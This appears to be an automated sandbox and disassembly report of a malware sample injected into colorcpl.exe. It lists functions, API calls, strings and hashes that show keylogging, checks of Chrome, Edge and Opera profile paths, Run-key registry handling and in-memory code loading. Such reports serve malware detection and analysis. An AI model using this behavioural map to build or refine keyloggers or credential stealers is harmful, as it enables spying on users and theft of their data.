                                        Yara matches
                                        Similarity
                                        • API ID: CallFilterFunc@8
                                        • String ID: @F$@F
                                        • API String ID: 4062629308-3436687868
                                        • Opcode ID: 01fc5d24cbcc55c590743250a7815fc602d781154dc714b2f4e2244749786215
                                        • Instruction ID: 69898e2a79d5d670b13a758e60eb206fe240a68dbe744c09dee46554fff227a3
                                        • Opcode Fuzzy Hash: 01fc5d24cbcc55c590743250a7815fc602d781154dc714b2f4e2244749786215
                                        • Instruction Fuzzy Hash: BF212C71A102019FF7D8AB7C9C0436E33959F92334F384319D8359BAE8EB769543C646
                                        Function 0690B5B9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 74COMMON
                                        Download Yara Rule
                                        APIs
                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 0690B681
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_68d0000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CallFilterFunc@8
                                        • String ID: @F$@F
                                        • API String ID: 4062629308-3436687868
                                        • Opcode ID: 5427aaeeb1dd16046c7ffdb0152beac211c34e67c25787d2885becd2e811340c
                                        • Instruction ID: 603274de467859bb7ae7e1993df42d13881488add31db0e24bea030ca7859775
                                        • Opcode Fuzzy Hash: 5427aaeeb1dd16046c7ffdb0152beac211c34e67c25787d2885becd2e811340c
                                        • Instruction Fuzzy Hash: 3F216B71E102148FF7D8AB788C1176D33555F81334F244359E8319BAD8EB7A8942CB96
                                        Function 04A84FD4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetLocalTime.KERNEL32(?,04AF24A8,?,00000000,?,?,?,?,?,?,04A946C2,?,00000001,0000004C,00000000), ref: 04A85010
                                          • Part of subcall function 04A994DA: GetLocalTime.KERNEL32(00000000), ref: 04A994F4
                                        • GetLocalTime.KERNEL32(?,04AF24A8,?,00000000,?,?,?,?,?,?,04A946C2,?,00000001,0000004C,00000000), ref: 04A85067
                                        Strings
                                        • Connection KeepAlive | Enabled | Timeout: , xrefs: 04A84FFF
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: LocalTime
                                        • String ID: Connection KeepAlive | Enabled | Timeout:
                                        • API String ID: 481472006-507513762
                                        • Opcode ID: 9df96a8f6d6bc7a1653514e63780cbb70c058275affd7c5bc6b12a7ae3e0b84c
                                        • Instruction ID: a547f094b091a6872a3d617531f91b03b0134bae4615075fa46fb74f36f7a0ae
                                        • Opcode Fuzzy Hash: 9df96a8f6d6bc7a1653514e63780cbb70c058275affd7c5bc6b12a7ae3e0b84c
                                        • Instruction Fuzzy Hash: 5D21F6A2D002406FF705FB60995472B7BA8E7A9308F04059DEC4507281DB2EBE0AC7D3
                                        Function 0690B6BB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_68d0000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free
                                        • String ID: XF
                                        • API String ID: 269201875-1082896132
                                        • Opcode ID: eba3c358ff5f7463530d74fbcc6cdba17ec45552898dfcf13cef1084320ecdf4
                                        • Instruction ID: da0768b16465ad9f45f894888e82e409ec890c42b741ca15a2b23914fd4f2168
                                        • Opcode Fuzzy Hash: eba3c358ff5f7463530d74fbcc6cdba17ec45552898dfcf13cef1084320ecdf4
                                        • Instruction Fuzzy Hash: 2B11B271E103105FE7A09B2ABC41B5636D8AB45B70F240636E971DFBE4F3B1D8864B86
                                        Function 04A994DA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetLocalTime.KERNEL32(00000000), ref: 04A994F4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: LocalTime
                                        • String ID: | $%02i:%02i:%02i:%03i
                                        • API String ID: 481472006-2430845779
                                        • Opcode ID: 8d1bbcfcce405740bc4d09a0706d24f6da8c1f45c3f98fcf688394b449cbe95d
                                        • Instruction ID: 6e6ebf6e53dba37118d033c3758d0c3a7a86b4293ed9c593dad90bebadc4964c
                                        • Opcode Fuzzy Hash: 8d1bbcfcce405740bc4d09a0706d24f6da8c1f45c3f98fcf688394b449cbe95d
                                        • Instruction Fuzzy Hash: 2F1121715042046AD704FBA5D9548FFB7E8EB94208F500A1EF895861D1FF38FE4AC752
                                        Function 04A89F9A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 04A8A0B0: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 04A8A0BE
                                          • Part of subcall function 04A8A0B0: wsprintfW.USER32 ref: 04A8A13F
                                          • Part of subcall function 04A994DA: GetLocalTime.KERNEL32(00000000), ref: 04A994F4
                                        • CloseHandle.KERNEL32(?), ref: 04A89FFD
                                        • UnhookWindowsHookEx.USER32 ref: 04A8A010
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                        • String ID: Online Keylogger Stopped
                                        • API String ID: 1623830855-1496645233
                                        • Opcode ID: 5904fa3a42edeb8fc062141cf6e22795342b9d3c9c43773fe56096ed90e01c5c
                                        • Instruction ID: 664b47770d58a3166265fce173694bd580e63897aa8907d3eb64d1b510dcdd08
                                        • Opcode Fuzzy Hash: 5904fa3a42edeb8fc062141cf6e22795342b9d3c9c43773fe56096ed90e01c5c
                                        • Instruction Fuzzy Hash: 8A01F736A002006FFB257B78C90A7FE7BF5DB42215F40058ED48202581EBA63C57D7D6
                                        Function 0691D01C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 069164EA: _free.LIBCMT ref: 06916521
                                          • Part of subcall function 069164EA: _abort.LIBCMT ref: 06916568
                                        • _abort.LIBCMT ref: 0691D04E
                                        • _free.LIBCMT ref: 0691D082
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_68d0000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _abort_free
                                        • String ID: pF
                                        • API String ID: 4174849134-2973420481
                                        • Opcode ID: 27a83d5959e399e126d66fc0e9bc80bad5e8b5edace6ebc33031c21e2b203fc3
                                        • Instruction ID: 167b6b8e3386c81c0008b6da526d6a30097469a488049bbfafdc8f0fe3b753b8
                                        • Opcode Fuzzy Hash: 27a83d5959e399e126d66fc0e9bc80bad5e8b5edace6ebc33031c21e2b203fc3
                                        • Instruction Fuzzy Hash: C101C475D02629DBC7E1EF599800219B7A4BF44B20F35021AD9386BA80D7746A4BCFC6
                                        Function 04A8B4CA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                        Download Yara Rule
                                        APIs
                                        • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000,?,?,?,?,?,?,04A8B604), ref: 04A8B4FD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExistsFilePath
                                        • String ID: AppData$\Opera Software\Opera Stable\
                                        • API String ID: 1174141254-1629609700
                                        • Opcode ID: 7a2e59d64ff0ac41a53157fd52a94274ba73291e7dfc4a3a8e447e3a1ecb8217
                                        • Instruction ID: 93aa3fe9e794d943c2debf708b9967a0ec72cb8fa5ffeb9161e6c3f1498fea5a
                                        • Opcode Fuzzy Hash: 7a2e59d64ff0ac41a53157fd52a94274ba73291e7dfc4a3a8e447e3a1ecb8217
                                        • Instruction Fuzzy Hash: 6AF08930901219A7AB04F7E1CE07CFF776CDF14A04B40005EA91252191EE55B94687E0
                                        Function 04A8B404 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                        Download Yara Rule
                                        APIs
                                        • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000,?,?,?,?,?,?,04A8B53E), ref: 04A8B437
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExistsFilePath
                                        • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                        • API String ID: 1174141254-4188645398
                                        • Opcode ID: 9bb05b15b72027a29d773b63bcc5fae596ac2372221a70adf4cf737fb645d54e
                                        • Instruction ID: 164cb9572772f4cbc4e651349f9e706283d1599e681005e12a7cd5b7506a8f9d
                                        • Opcode Fuzzy Hash: 9bb05b15b72027a29d773b63bcc5fae596ac2372221a70adf4cf737fb645d54e
                                        • Instruction Fuzzy Hash: A1F0AE3090131567AF04F7E5DD17CFF772CEF10614B40005E6B1153581EE55784687E1
                                        Function 04A8B467 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                        Download Yara Rule
                                        APIs
                                        • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000,?,?,?,?,?,?,04A8B5A1), ref: 04A8B49A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExistsFilePath
                                        • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                        • API String ID: 1174141254-2800177040
                                        • Opcode ID: 8f9c5731acdd3ed460ed11ab99fe291ca8a058f374e4239fa4a0cba1919767d1
                                        • Instruction ID: eb9819da975c4c70153c7473cd5d0fe2cade4e7517f49728d5a434716675ba80
                                        • Opcode Fuzzy Hash: 8f9c5731acdd3ed460ed11ab99fe291ca8a058f374e4239fa4a0cba1919767d1
                                        • Instruction Fuzzy Hash: 9CF08230A0121AA7AB04F7E5CE17CFF7B2CEB10604B40045EAB1292181EE59784687E1
                                        Function 04A8A592 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetKeyState.USER32(00000011), ref: 04A8A597
                                          • Part of subcall function 04A89468: GetForegroundWindow.USER32 ref: 04A8949C
                                          • Part of subcall function 04A89468: GetWindowThreadProcessId.USER32(00000000,?), ref: 04A894A7
                                          • Part of subcall function 04A89468: GetKeyboardLayout.USER32(00000000), ref: 04A894AE
                                          • Part of subcall function 04A89468: GetKeyState.USER32(00000010), ref: 04A894B8
                                          • Part of subcall function 04A89468: GetKeyboardState.USER32(?), ref: 04A894C5
                                          • Part of subcall function 04A89468: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 04A894E1
                                          • Part of subcall function 04A8962E: SetEvent.KERNEL32(?,?,00000000,04A8A156,00000000), ref: 04A8965A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: State$KeyboardWindow$EventForegroundLayoutProcessThreadUnicode
                                        • String ID: [AltL]$[AltR]
                                        • API String ID: 3195419117-2658077756
                                        • Opcode ID: 4cc25b5ab8f0ae89dff3f43c1ed57b5ff6964593a274b1b018f90f55fa58fe40
                                        • Instruction ID: c171e6b1350d791887eafbb7fc92b292ef1f7c3cf0dff932843a3906b57e0ba7
                                        • Opcode Fuzzy Hash: 4cc25b5ab8f0ae89dff3f43c1ed57b5ff6964593a274b1b018f90f55fa58fe40
                                        • Instruction Fuzzy Hash: D8E068727002201BAC2C333D6A2A6BE7D24CB46A60F80005EEC424B284EC5ABD8087D6
                                        Function 04A8A5EC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetKeyState.USER32(00000012), ref: 04A8A5F1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: State
                                        • String ID: [CtrlL]$[CtrlR]
                                        • API String ID: 1649606143-2446555240
                                        • Opcode ID: 365f7f0f47908061261ee6e99868a070f42311fc4d14d0fc9cee15584d687cd7
                                        • Instruction ID: 74ccefc36954b71d18692034fcdd7a1d20257ebb010b774a64cf8314989f7cbf
                                        • Opcode Fuzzy Hash: 365f7f0f47908061261ee6e99868a070f42311fc4d14d0fc9cee15584d687cd7
                                        • Instruction Fuzzy Hash: 51E07D317042111FD9143ABE561A67C6C20DB011A8F01002EEC8347189D84BB80207D2
                                        Function 04A92414 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,04AF21E8,80000002,80000002,04A8BD02,00000000,?,04AF2200,pth_unenc,04AF21E8), ref: 04A92422
                                        • RegDeleteValueW.ADVAPI32(04AF21E8,?,?,04AF2200,pth_unenc,04AF21E8), ref: 04A92436
                                        Strings
                                        • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 04A92420
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: DeleteOpenValue
                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                        • API String ID: 2654517830-1051519024
                                        • Opcode ID: cbabdcaa5a2086aaa41132de1fe999ef9e655b89920135d3f361126602152c98
                                        • Instruction ID: 7d061a36a6cd12fdb7c64bf02b550c093c71db9d644e4075408d645f2a244863
                                        • Opcode Fuzzy Hash: cbabdcaa5a2086aaa41132de1fe999ef9e655b89920135d3f361126602152c98
                                        • Instruction Fuzzy Hash: D8E0C232254208BBEF104FB1DD07FFA37BCDB41B01F008694BD0692080D6269E059660
                                        Function 04ABB445 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,04A81D35), ref: 04ABB4DB
                                        • GetLastError.KERNEL32 ref: 04ABB4E9
                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 04ABB544
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharMultiWide$ErrorLast
                                        • String ID:
                                        • API String ID: 1717984340-0
                                        • Opcode ID: 8d4474ad94704da48617488c7f98ce441a885d82b0bdf4fed22d0e4095b1620e
                                        • Instruction ID: 6c0f2c6d0f79f6aba217d68ada08ad20e809e835462106092d796fd4ffaaba42
                                        • Opcode Fuzzy Hash: 8d4474ad94704da48617488c7f98ce441a885d82b0bdf4fed22d0e4095b1620e
                                        • Instruction Fuzzy Hash: 8441D771600245AFDB218F64D844AEA7BBCEF09710F148259E9D75B5A2EB31F901CBF2
                                        Function 04A905C4 Relevance: 5.1, APIs: 4, Instructions: 119COMMON
                                        Download Yara Rule
                                        APIs
                                        • IsBadReadPtr.KERNEL32(?,00000014), ref: 04A905F1
                                        • IsBadReadPtr.KERNEL32(?,00000014), ref: 04A906BD
                                        • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 04A906DF
                                        • SetLastError.KERNEL32(0000007E,04A90955), ref: 04A906F6
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLastRead
                                        • String ID:
                                        • API String ID: 4100373531-0
                                        • Opcode ID: bf384ac12d07166bbaba218bfd69aab438fc08239e0ee2645d5c83b8b5138729
                                        • Instruction ID: 7a6617d6f1cb94a9a2feddc5e1ae40ff9c65010791e7e6df388ce59e8d19f984
                                        • Opcode Fuzzy Hash: bf384ac12d07166bbaba218bfd69aab438fc08239e0ee2645d5c83b8b5138729
                                        • Instruction Fuzzy Hash: B3416B71608315DFEB208F29DC84B66B7E9FF88754F00482DEA8696651EBB1FD05CB11

                                        Execution Graph

                                        Execution Coverage:7.4%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:0%
                                        Total number of Nodes:170
                                        Total number of Limit Nodes:15
                                        execution_graph 24439 2c71727 24440 2c7173c 24439->24440 24441 2c71968 24439->24441 24451 2c717cb Sleep 24440->24451 24453 2c7174e 24440->24453 24442 2c71938 24441->24442 24443 2c71a80 24441->24443 24447 2c71947 Sleep 24442->24447 24456 2c71986 24442->24456 24445 2c71684 VirtualAlloc 24443->24445 24446 2c71a89 24443->24446 24444 2c7175d 24448 2c716bf 24445->24448 24449 2c716af 24445->24449 24450 2c7195d Sleep 24447->24450 24447->24456 24463 2c71644 24449->24463 24450->24442 24451->24453 24455 2c717e4 Sleep 24451->24455 24452 2c7182c 24462 2c71838 24452->24462 24469 2c715cc 24452->24469 24453->24444 24453->24452 24457 2c7180a Sleep 24453->24457 24455->24440 24459 2c715cc VirtualAlloc 24456->24459 24460 2c719a4 24456->24460 24457->24452 24458 2c71820 Sleep 24457->24458 24458->24453 24459->24460 24464 2c71681 24463->24464 24465 2c7164d 24463->24465 24464->24448 24465->24464 24466 2c7164f Sleep 24465->24466 24467 2c71664 24466->24467 24467->24464 24468 2c71668 Sleep 24467->24468 24468->24465 24473 2c71560 24469->24473 24471 2c715d4 VirtualAlloc 24472 2c715eb 24471->24472 24472->24462 24474 2c71500 24473->24474 24474->24471 24475 2c71a8f 24476 2c71aa1 24475->24476 24477 2c71b6c 24475->24477 24479 2c71aa7 24476->24479 24482 2c71b13 Sleep 24476->24482 24478 2c716e8 24477->24478 24477->24479 24481 2c71c66 24478->24481 24483 2c71644 2 API calls 24478->24483 24480 2c71ab0 24479->24480 24485 2c71b4b Sleep 24479->24485 24489 2c71b81 24479->24489 24482->24479 24484 2c71b2d Sleep 24482->24484 24486 2c716f5 VirtualFree 24483->24486 24484->24476 24487 2c71b61 Sleep 24485->24487 24485->24489 24488 2c7170d 24486->24488 24487->24479 24490 2c71c00 VirtualFree 24489->24490 24491 2c71ba4 24489->24491 24492 2c9bb50 timeSetEvent 24493 2c9bb44 24496 2c8ec74 24493->24496 24497 2c8ec7c 24496->24497 24497->24497 26837 2c8870c LoadLibraryW 24497->26837 24499 2c8ec9e 24500 2c8eca3 24499->24500 24501 2c8ecad 24500->24501 24502 2c8ecb3 24501->24502 24503 2c8ecc8 24502->24503 24504 2c8ecb7 24502->24504 24506 2c74500 8 API calls 24503->24506 26851 2c74500 24504->26851 24507 2c8ecc6 24506->24507 26842 2c7480c 24507->26842 26857 2c880c8 26837->26857 26839 2c88745 26865 2c87d00 26839->26865 26843 2c7481d 26842->26843 26844 2c74843 26843->26844 26845 2c7485a 26843->26845 26846 2c74b78 8 API calls 26844->26846 26847 2c74570 8 API calls 26845->26847 26848 2c74850 26846->26848 26847->26848 26849 2c7488b 26848->26849 26850 2c74500 8 API calls 26848->26850 26850->26849 26852 2c74504 26851->26852 26854 2c74514 26851->26854 26852->26854 26855 2c74570 8 API calls 26852->26855 26853 2c74542 26853->24507 26854->26853 26911 2c72c2c 8 API calls 26854->26911 26855->26854 26858 2c74500 8 API calls 26857->26858 26859 2c880ed 26858->26859 26876 2c87914 26859->26876 26861 2c880fa 26862 2c8811a GetProcAddress GetProcAddress 26861->26862 26880 2c744d0 26862->26880 26866 2c74500 8 API calls 26865->26866 26867 2c87d25 26866->26867 26868 2c87914 8 API calls 26867->26868 26869 2c87d32 26868->26869 26902 2c88020 26869->26902 26872 2c880c8 10 API calls 26873 2c87d5b NtWriteVirtualMemory 26872->26873 26874 2c744d0 8 API calls 26873->26874 26875 2c87d94 FreeLibrary 26874->26875 26875->24499 26877 2c87925 26876->26877 26884 2c74b78 26877->26884 26879 2c87935 26879->26861 26882 2c744d6 26880->26882 26881 2c744fc 26881->26839 26882->26881 26901 2c72c2c 8 API calls 26882->26901 26886 2c74b85 26884->26886 26889 2c74bb5 26884->26889 26887 2c74b91 26886->26887 26890 2c74570 26886->26890 26887->26879 26895 2c744ac 26889->26895 26891 2c74574 26890->26891 26892 2c74598 26890->26892 26899 2c72c10 8 API calls 26891->26899 26892->26889 26894 2c74581 26894->26889 26896 2c744b2 26895->26896 26897 2c744cd 26895->26897 26896->26897 26900 2c72c2c 8 API calls 26896->26900 26897->26887 26899->26894 26900->26897 26901->26882 26903 2c74500 8 API calls 26902->26903 26904 2c88043 26903->26904 26905 2c87914 8 API calls 26904->26905 26906 2c88050 26905->26906 26907 2c880c8 10 API calls 26906->26907 26908 2c88069 GetModuleHandleA 26907->26908 26909 2c744ac 8 API calls 26908->26909 26910 2c87d55 26909->26910 26910->26872 26911->26853 26912 2c74e88 26913 2c74e95 26912->26913 26917 2c74e9c 26912->26917 26918 2c74be4 26913->26918 26921 2c74bfc 26917->26921 26919 2c74bdc 26918->26919 26920 2c74be8 SysAllocStringLen 26918->26920 26919->26917 26920->26919 26922 2c74c02 SysFreeString 26921->26922 26923 2c74c08 26921->26923 26922->26923 26924 2c76518 26925 2c76523 26924->26925 26928 2c74168 26925->26928 26927 2c7655d 26929 2c741ae 26928->26929 26930 2c7422c 26929->26930 26940 2c74100 26929->26940 26930->26927 26932 2c743fa 26930->26932 26933 2c743e9 26930->26933 26936 2c7443f FreeLibrary 26932->26936 26937 2c74463 26932->26937 26945 2c7432c GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 26933->26945 26935 2c743f3 26935->26932 26936->26932 26938 2c74472 ExitProcess 26937->26938 26939 2c7446c 26937->26939 26939->26938 26941 2c74143 26940->26941 26942 2c74110 26940->26942 26941->26930 26942->26941 26944 2c715cc VirtualAlloc 26942->26944 26946 2c75814 26942->26946 26944->26942 26945->26935 26947 2c75824 GetModuleFileNameA 26946->26947 26948 2c75840 26946->26948 26950 2c75a78 GetModuleFileNameA RegOpenKeyExA 26947->26950 26948->26942 26951 2c75afb 26950->26951 26952 2c75abb RegOpenKeyExA 26950->26952 26968 2c758b4 6 API calls 26951->26968 26952->26951 26954 2c75ad9 RegOpenKeyExA 26952->26954 26954->26951 26955 2c75b84 lstrcpyn GetThreadLocale GetLocaleInfoA 26954->26955 26959 2c75c9e 26955->26959 26960 2c75bbb 26955->26960 26956 2c75b20 RegQueryValueExA 26957 2c75b62 RegCloseKey 26956->26957 26958 2c75b40 RegQueryValueExA 26956->26958 26957->26948 26958->26957 26961 2c75b5e 26958->26961 26959->26948 26960->26959 26962 2c75bcb lstrlen 26960->26962 26961->26957 26963 2c75be3 26962->26963 26963->26959 26964 2c75c08 lstrcpyn LoadLibraryExA 26963->26964 26965 2c75c30 26963->26965 26964->26965 26965->26959 26966 2c75c3a lstrcpyn LoadLibraryExA 26965->26966 26966->26959 26967 2c75c6c lstrcpyn LoadLibraryExA 26966->26967 26967->26959 26968->26956

                                        Executed Functions

                                        Function 02C75A78 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 184registrystringlibraryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 7738 2c75a78-2c75ab9 GetModuleFileNameA RegOpenKeyExA 7739 2c75afb-2c75b3e call 2c758b4 RegQueryValueExA 7738->7739 7740 2c75abb-2c75ad7 RegOpenKeyExA 7738->7740 7745 2c75b62-2c75b7c RegCloseKey 7739->7745 7746 2c75b40-2c75b5c RegQueryValueExA 7739->7746 7740->7739 7742 2c75ad9-2c75af5 RegOpenKeyExA 7740->7742 7742->7739 7743 2c75b84-2c75bb5 lstrcpyn GetThreadLocale GetLocaleInfoA 7742->7743 7747 2c75c9e-2c75ca5 7743->7747 7748 2c75bbb-2c75bbf 7743->7748 7746->7745 7749 2c75b5e 7746->7749 7750 2c75bc1-2c75bc5 7748->7750 7751 2c75bcb-2c75be1 lstrlen 7748->7751 7749->7745 7750->7747 7750->7751 7752 2c75be4-2c75be7 7751->7752 7753 2c75bf3-2c75bfb 7752->7753 7754 2c75be9-2c75bf1 7752->7754 7753->7747 7756 2c75c01-2c75c06 7753->7756 7754->7753 7755 2c75be3 7754->7755 7755->7752 7757 2c75c30-2c75c32 7756->7757 7758 2c75c08-2c75c2e lstrcpyn LoadLibraryExA 7756->7758 7757->7747 7759 2c75c34-2c75c38 7757->7759 7758->7757 7759->7747 7760 2c75c3a-2c75c6a lstrcpyn LoadLibraryExA 7759->7760 7760->7747 7761 2c75c6c-2c75c9c lstrcpyn LoadLibraryExA 7760->7761 7761->7747
                                        APIs
                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 02C75A94
                                        • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02C75AB2
                                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02C75AD0
                                        • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02C75AEE
                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,02C75B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02C75B37
                                        • RegQueryValueExA.ADVAPI32(?,02C75CE4,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,02C75B7D,?,80000001), ref: 02C75B55
                                        • RegCloseKey.ADVAPI32(?,02C75B84,00000000,00000000,00000005,00000000,02C75B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02C75B77
                                        • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02C75B94
                                        • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105), ref: 02C75BA1
                                        • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105), ref: 02C75BA7
                                        • lstrlen.KERNEL32(00000000), ref: 02C75BD2
                                        • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 02C75C19
                                        • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02C75C29
                                        • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 02C75C51
                                        • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02C75C61
                                        • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 02C75C87
